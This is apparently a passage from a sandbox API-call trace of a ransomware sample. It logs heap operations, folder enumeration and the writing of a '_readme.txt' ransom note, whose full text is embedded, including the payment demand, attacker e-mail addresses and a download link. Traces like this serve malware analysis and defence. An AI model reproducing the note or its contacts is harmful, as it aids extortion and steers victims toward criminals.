0x32d9428 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.779] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.779] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.779] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.779] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.779] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0209.779] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.779] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.779] PathFindFileNameW (pszPath="") returned="" [0209.779] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.779] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.780] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.780] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.780] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.780] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.780] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.780] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.780] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0209.780] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.780] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0209.781] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.782] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.782] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.782] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.782] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.782] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.785] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.785] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.785] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.785] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.786] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.786] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.787] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.787] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.788] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.789] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.789] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.790] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.791] 